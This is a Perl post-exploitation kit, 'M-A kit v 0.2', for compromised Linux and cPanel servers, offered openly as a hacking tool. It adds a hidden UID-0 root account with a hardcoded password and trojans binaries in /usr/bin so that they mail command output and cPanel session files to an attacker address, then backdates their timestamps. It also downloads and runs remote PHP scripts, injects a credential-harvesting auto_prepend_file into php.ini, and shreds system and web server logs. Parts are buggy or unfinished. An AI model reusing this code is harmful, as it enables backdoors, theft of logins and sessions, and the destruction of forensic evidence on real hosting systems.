m-a kit v 0.2 ( public version )

1. #!/usr/bin/perl
2. # By b0y h4ck3r
3. # Many Thanks for : Mr_Anarshi_T , riyah nasr & foxy for helping :D
4. # Not Tested Yet :P
5. # http://upload.traidnt.net/upfiles/Ytu96952.png
6. use Term::ANSIColor;
7. use Sys::Hostname;
8. use Socket;
9. my $host = hostname();
10. if ($#ARGV < 0) {
11. menu:;
12. print color("red"), "[+] M-A kit v 0.2\n";
13. print color 'reset';
14. sleep 1;
15. print color("red"), "1. Add new root user";
16. print color 'reset';
17. print color("red"), "\n2. Auto ev!l c0de Inject0r";
18. print color 'reset';
19. print color("red"), "\n3. Auto Cpanel Session sending to e-mail";
20. print color 'reset';
21. print color("red"), "\n4. Search root password from cpanel session file"; #d0ne
22. print color 'reset';
23. print color("red"), "\n5. Log Cleaner"; #d0ne
24. print color 'reset';
25. # idea by DamaneDZ
26. print color("red"), "\n6. Mass Login info hunting"; #d0ne
27. print color 'reset';
28. print color("red"), "\n7. Exit";
29. print color 'reset';
30. print color("red"), "\n\nr00t~M-A: ";
31. print color 'reset';
32. $menu = <>;
33. if ($menu =~ /1/){
34.     goto addroot;
35.     }
36.     if ($menu =~ /2/){
37.         goto sessions;
38.     }
39.         if ($menu =~ /3/){
40.         goto sesend;
41.     }
42.     if ($menu =~ /4/){
43.         goto getrootsession;
44.     }
45.    
46.     if ($menu =~ /5/){
47.         goto logclean;
48.     }
49.     if ($menu =~ /6/){
50.         goto huntingpublic1;
51.     }
52.     if ($menu =~ /7/){
53.         goto exit;
54.     }
55.     else {
56.  
57.         print "\t\tUnknow Choise Idiot\n";
58.         goto menu;
59.     };
60.  
61. addroot:;
62. print color("red"), "[+] M-A kit v 0.2\n";
63. print color 'reset';
64. sleep 1;
65. print color("green"), "[+] Adding new root\n";
66. print color 'reset';
67. print color("yellow"), "[-] Enter New root name : \n";
68. print color 'reset';
69. my $newrootuser=<STDIN>;
70. chomp($newrootuser);
71. print color("yellow"), "[-] Enter New root Pass : \n";
72. print color 'reset';
73. my $newrootpass=<STDIN>;
74. chomp($newrootpass);
75. print color("yellow"), "[-] Enter New root Path : \n";
76. print color 'reset';
77. my $dir=<STDIN>;
78. chomp($dir);
79. {
80. system("useradd $newrootuser -g 0 -G wheel,sys,bin,daemon,adm,disk -d $dir -s /bin/sh");
81. system("echo $newrootpass | passwd $newrootuser --stdin");
82. system("sed -i \"s/x:[0-9]*:0/x:0:0:root/g\" /etc/passwd");
83. }
84. print color("green"), "[+] d0ne Adding new root \n";
85. print color 'reset';
86. sleep 2;
87. {
88. system("clear");
89. }
90. goto menu;
91. sessions:;
92. print color("red"), "[+] M-A kit v 0.2\n";
93. print color 'reset';
94. sleep 1;
95. print color("green"), "[+] Configuring ...\n";
96. print color 'reset';
97. print color("yellow"), "[-] Enter File that you whant to inject ev!l c0de  : \n";
98. print color 'reset';
99.         my $file=<STDIN>;
100.         chomp($file);
101.         print color("yellow"), "[-] Enter ev!l c0de  : \n";
102. print color 'reset';
103.         my $evil=<STDIN>;
104.         chomp($evil);
105.                 print color("yellow"), "[-] Enter Your email to send result  : \n";
106. print color 'reset';
107.         my $emailrez=<STDIN>;
108.         chomp($emailrez);
109. print color("bold white"), "[-] Lanching ....\n";
110. print color 'reset';
111. $code = "\#include<stdio.h>";
112. $code2 = "\#include<stdlib.h>";
113. $boy = "main()";
114. $boy4 = "{";
115. $boy2 = "system(\"$evil | mail -s \"\"$host Info\"\" $emailrez\");";
116. $boy3 = "system(\"/usr/bin/system\");";
117. open(TN,">>/usr/bin/$file.c");
118. print TN "$code\n";
119. print TN "$code2\n";
120. print TN "$boy\n";
121. print TN "$boy4\n";
122. print TN "$boy2\n";
123. print TN "$boy3\n";
124. print TN "}";
125. print TN "\n";
126. close(TN);
127. print color("bold white"), "[-] Creating ev!l c0de\n";
128. print color 'reset';
129. {
130. system("cd /usr/bin");
131. system("rm -fr /usr/bin/system");
132. system("cp /usr/bin/$file /usr/bin/system");
133. system("rm -fr /usr/bin/$file");
134. system("gcc /usr/bin/$file.c -o /usr/bin/$file");
135. system("rm -fr /usr/bin/$file.c");
136. }
137. print color("bold white"), "[-] Replacing code by the ev!l c0de \n";
138. print color 'reset';
139. {
140. system("touch -t 1001010433 /usr/bin/$file");
141. system("touch -t 1001010433 /usr/bin/system");
142. system("chmod +x /usr/bin/system");
143. }
144. print color("bold white"), "[-] Changing access and modification time of the ev!l c0de\n";
145. print color 'reset';
146. print color("green"), "[+] Okay d0ne \n";
147. print color 'reset';
148. sleep 2;
149. {
150. system("clear");
151. }
152. goto menu;
153. sesend:;
154. print color("red"), "[+] M-A kit v 0.2\n";
155. print color 'reset';
156. sleep 1;
157. print color("green"), "[+] Configuring ...\n";
158. print color 'reset';
159. print color("yellow"), "[-] Enter File that you whant to inject in  : \n";
160. print color 'reset';
161.         my $file2=<STDIN>;
162.         chomp($file2);
163. print color("yellow"), "[-] Enter your E-mail  : \n";
164. print color 'reset';
165.         my $email=<STDIN>;
166.         chomp($email);
167. $evil2 = "cd /var/cpanel/sessions/raw/ && cat * | mail -s \"\"$host Sessions Info\"\" $email";
168. $line1 = "\#include<stdio.h>";
169. $line2 = "\#include<stdlib.h>";
170. $line3 = "main()";
171. $line4 = "{";
172. $line5 = "system(\"$evil2\");";
173. $line6 = "system(\"/usr/bin/systems\");";
174. open(TN,">>/usr/bin/$file2.c");
175. print TN "$line1\n";
176. print TN "$line2\n";
177. print TN "$line3\n";
178. print TN "$line4\n";
179. print TN "$line5\n";
180. print TN "$line6\n";
181. print TN "}";
182. print TN "\n";
183. close(TN);
184. {
185. system("cd /usr/bin");
186. system("rm -fr /usr/bin/systems");
187. system("cp /usr/bin/$file2 /usr/bin/systems");
188. system("rm -fr /usr/bin/$file2");
189. system("gcc /usr/bin/$file2.c -o /usr/bin/$file2");
190. system("rm -fr /usr/bin/$file2.c");
191. system("touch -t 1001010433 /usr/bin/$file2");
192. system("touch -t 1001010433 /usr/bin/systems");
193. system("chmod +x /usr/bin/systems");
194. }
195. print color("green"), "[+] Okay d0ne , don't test it plz :P \n";
196. print color 'reset';
197. sleep 2;
198. {
199. system("clear");
200. }
201. goto menu;
202. sessions:;
203. close;
204. getrootsession:;
205. # by RAB3OUN
206. print color("red"), "[+] M-A kit v 0.2\n";
207. print color 'reset';
208. sleep 1;
209. system("wget http://pastebin.com/raw.php?i=9Edn8gUs -o test.php");
210. my $output = "php test.php";
211. print color("green"), "\n$output\n";
212. print color 'reset';
213. system("rm -rf test.php");
214. sleep 2,
215. print "Have you copied the info ? y/n";
216. $cpoiedinfo=<STDIN>;
217. chomp $cpoiedinfo;
218. if ($cpoiedinfo eq "y")
219. {
220. print "So Fast\n";
221. sleep 2,
222. system("clear");
223. goto menu;
224. }
225. if ($cpoiedinfo eq "n")
226. {
227. print "-_- ok!! \n";
228. }
229.  
230. logclean:;
231. print color("red"), "[+] M-A kit v 0.2\n";
232. print color 'reset';
233. print color("green"), "[+] Okay cleanning ...\n";
234. print color 'reset';
235. sleep 1;
236. # $file you must put log dirs from to-add.txt
237. @logpaths=('/var/log/auth.log','/var/log/message','/var/log/faillog','/var/log/btmp','/var/log/user.log','/var/log/lastlog','/usr/local/apache/logs/access_log','/usr/local/apache/logs/error_log','/usr/local/apache/domlogs/','/usr/local/apache/logs/suexec_log','/var/log/exim_mainlog','/var/log/exim_paniclog','/var/log/exim_rejectlog','/var/log/maillog','/usr/local/jakarta/tomcat/logs/catalina.err','/usr/local/jakarta/tomcat/logs/catalina.out','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/cpbackup/*.log','/var/log/secure','/home/user/logs');
238. foreach $logpath(@logpaths)
239. {
240. system("shred -f -n 500 $logpath");
241. system("rm -rf $logpath");
242. }
243. print color("green"), "[+] d0ne\n";
244. sleep 1;
245. print color 'reset';
246. system("clear");
247. goto menu;
248. huntingpublic1:;
249. print color("red"), "[+] M-A kit v 0.2\n";
250. print color 'reset';
251. # by G-B
252. print color("green"), "[+] Please Enter Your Email : \n";
253. print color 'reset';
254. $huntemail=<STDIN>;
255. chomp $huntemail;
256. system("cd /usr/local/lib/");
257. system("sed -i '/auto_prepend_file/c\auto_prepend_file = /usr/local/lib/ini.php' php.ini");
258. system("wget http://pastebin.com/raw.php?i=1dRkxRtN -o ini.php");
259. system("sed -i ‘s/huntmail/$huntemail/’ ini.php");
260. system("/etc/init.d/apache2 stop");
261. system("/etc/init.d/apache2 start");
262. print color("green"), "[+] Ok Done\n";
263. print color 'reset';
264. sleep 2;
265. {
266. system("clear");
267. }
268. goto menu;
269. } elsif ($ARGV[0] =~ "addroot" )
270.  {
271.  print color("red"), "[+] M-A kit v 0.2\n";
272. print color 'reset';
273. sleep 1;
274. print color("green"), "[+] Adding new root\n";
275. print color 'reset';
276. $newrootuser = "roots";
277. $newrootpass = "p455w0rd";
278. $dir = "/dir";
279.  {
280. system("useradd $newrootuser -g 0 -G wheel,sys,bin,daemon,adm,disk -d $dir -s /bin/sh");
281. system("echo $newrootpass | passwd $newrootuser --stdin");
282. system("sed -i \"s/x:[0-9]*:0/x:0:0:root/g\" /etc/passwd");
283. }
284. print color("green"), "[+] d0ne\n";
285. print color 'reset';
286. }
287. if ($ARGV[0] =~ "evilcode" )
288. {
289. $evil = $ARGV[1];
290. $emailrez = "ght.hackers@gmail.com";
291. $file = "zip";
292. print color("red"), "[+] M-A kit v 0.2\n";
293. print color 'reset';
294. sleep 1;
295. print color("green"), "[+] Configuring ...\n";
296. print color 'reset';
297. $code = "\#include<stdio.h>";
298. $code2 = "\#include<stdlib.h>";
299. $boy = "main()";
300. $boy4 = "{";
301. $boy2 = "system(\"$evil | mail -s \"\"$host Info\"\" $emailrez\");";
302. $boy3 = "system(\"/usr/bin/system\");";
303. open(TN,">>/usr/bin/$file.c");
304. print TN "$code\n";
305. print TN "$code2\n";
306. print TN "$boy\n";
307. print TN "$boy4\n";
308. print TN "$boy2\n";
309. print TN "$boy3\n";
310. print TN "}";
311. print TN "\n";
312. close(TN);
313. print color("bold white"), "[-] Creating ev!l c0de\n";
314. print color 'reset';
315. {
316. system("cd /usr/bin");
317. system("rm -fr /usr/bin/system");
318. system("cp /usr/bin/$file /usr/bin/system");
319. system("rm -fr /usr/bin/$file");
320. system("gcc /usr/bin/$file.c -o /usr/bin/$file");
321. system("rm -fr /usr/bin/$file.c");
322. }
323. print color("bold white"), "[-] Replacing code by the ev!l c0de \n";
324. print color 'reset';
325. {
326. system("touch -t 1001010433 /usr/bin/$file");
327. system("touch -t 1001010433 /usr/bin/system");
328. system("chmod +x /usr/bin/system");
329. }
330. print color("bold white"), "[-] Changing access and modelsification time of the ev!l c0de\n";
331. print color 'reset';
332. print color("green"), "[+] Okay d0ne \n";
333. print color 'reset';
334. }
335. elsif ($ARGV[0] =~ "emailses" )
336.  
337. {
338. $email = "ght.hackers@gmail.com";
339. $file2 = $ARGV[1];
340. print = "$file2";
341. print color("red"), "[+] M-A kit v 0.2\n";
342. print color 'reset';
343. sleep 1;
344. print color("green"), "[+] Configuring ...\n";
345. print color 'reset';
346. $evil2 = "cd /var/cpanel/sessions/raw/ && cat * | mail -s \"\"$host Sessions Info\"\" $email";
347. $line1 = "\#include<stdio.h>";
348. $line2 = "\#include<stdlib.h>";
349. $line3 = "main()";
350. $line4 = "{";
351. $line5 = "system(\"$evil2\");";
352. $line6 = "system(\"/usr/bin/systems\");";
353. open(TN,">>/usr/bin/$file2.c");
354. print TN "$line1\n";
355. print TN "$line2\n";
356. print TN "$line3\n";
357. print TN "$line4\n";
358. print TN "$line5\n";
359. print TN "$line6\n";
360. print TN "}";
361. print TN "\n";
362. close(TN);
363. {
364. system("cd /usr/bin");
365. system("rm -fr /usr/bin/systems");
366. system("cp /usr/bin/$file2 /usr/bin/systems");
367. system("rm -fr /usr/bin/$file2");
368. system("gcc /usr/bin/$file2.c -o /usr/bin/$file2");
369. system("rm -fr /usr/bin/$file2.c");
370. system("touch -t 1001010433 /usr/bin/$file2");
371. system("touch -t 1001010433 /usr/bin/systems");
372. system("chmod +x /usr/bin/systems");
373. }
374. print color("green"), "[+] Okay d0ne , don't test it plz :P \n";
375. print color 'reset';
376. }
377. elsif ($ARGV[0] =~ "rootses" )
378. {
379. print color("red"), "[+] M-A kit v 0.2\n";
380. print color 'reset';
381. sleep 1;
382. system("wget http://pastebin.com/raw.php?i=9Edn8gUs -o test.php");
383. my $output = "php test.php";
384. print color("green"), "\n$output\n";
385. print color 'reset';
386. system("rm -rf test.php");
387. }
388. elsif ($ARGV[0] =~ "rootsql" )
389. {
390. print color("red"), "[+] M-A kit v 0.2\n";
391. print color 'reset';
392. sleep 1;
393. print color("green"), "[+] Searching ...\n";
394. print color 'reset';
395. print color("green"), "[-] This may take some time :D ...\n";
396. print color 'reset';
397. {
398. system("cat /usr/local/mysql/data/* > mysql1.txt");
399. system("cat /var/lib/mysql/* > mysql2.txt");
400. system("cat /var/run/mysqld/* > mysql3.txt");
401. system("cat mysql1.txt mysql2.txt mysql3.txt > mysql.txt");
402. system("rm -rf mysql1.txt && rm -rf mysql2.txt && rm -rf mysql3.txt");
403. system("%here i must sed hhhhhhh mysql.txt to grep s1 the root with password elsif it's found then to print it s1");
404. }
405. }
406. elsif ($ARGV[0] =~ "logclean" )
407. {
408. print color("red"), "[+] M-A kit v 0.2\n";
409. print color 'reset';
410. print color("green"), "[+] Okay cleanning ...\n";
411. print color 'reset';
412. sleep 1;
413. # $file you must put log dirs from to-add.txt
414. @logpaths=('/var/log/auth.log','/var/log/message','/var/log/faillog','/var/log/btmp','/var/log/user.log','/var/log/lastlog','/usr/local/apache/logs/access_log','/usr/local/apache/logs/error_log','/usr/local/apache/domlogs/','/usr/local/apache/logs/suexec_log','/var/log/exim_mainlog','/var/log/exim_paniclog','/var/log/exim_rejectlog','/var/log/maillog','/usr/local/jakarta/tomcat/logs/catalina.err','/usr/local/jakarta/tomcat/logs/catalina.out','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/cpbackup/*.log','/var/log/secure','/home/user/logs');
415. foreach $logpath(@logpaths)
416. {
417. system("shred -f -n 500 $logpath");
418. system("rm -rf $logpath");
419. }
420.  
421. print color("green"), "[+] d0ne\n";
422. } elsif ($ARGV[0] =~ "hunt" )
423. {
424. $huntemail = "ght.hackers@gmail.com";
425. print color("red"), "[+] M-A kit v 0.2\n";
426. print color 'reset';
427. # by G-B
428. system("cd /usr/local/lib/");
429. system("sed -i '/auto_prepend_file/c\auto_prepend_file = /usr/local/lib/ini.php' php.ini");
430. system("wget http://pastebin.com/raw.php?i=1dRkxRtN -o ini.php");
431. system("sed -i ‘s/huntmail/$huntemail/’ ini.php");
432. system("/etc/init.d/apache2 stop");
433. system("/etc/init.d/apache2 start");
434. print color("green"), "[+] Ok Done\n";
435. print color 'reset';
436. }
437. elsif ($ARGV[0] =~ "help" )
438.  {
439. print color("red"), "[+] M-A kit v 0.2\n";
440. print color 'reset';
441. print color("blue"), "[+] Welcome to Help Task :D\n";
442. print color 'reset';
443. print color("bold white"), "[-] To Add New Root : perl $0 addroot\n";
444. print color 'reset';
445. print color("bold white"), "[-] To Inject Code In a Commad : perl $0 evilcode code\n";
446. print color 'reset';
447. print color("bold white"), "[-] To Send Cpanel Session To email : perl $0 emailses file\n";
448. print color 'reset';
449. print color("bold white"), "[-] To Search Root Password From Session file : perl $0 rootses\n";
450. print color 'reset';
451. print color("bold white"), "[-] To Clean Log : perl $0 logclean\n";
452. print color 'reset';
453. print color("bold white"), "[-] To Hunt Loginig Information : perl $0 hunt\n";
454. print color 'reset';
455. print color("bold white"), "[-] To see this : perl $0 help\n";
456. print color 'reset';
457. }
458. # ok argv i hate you :( go to hell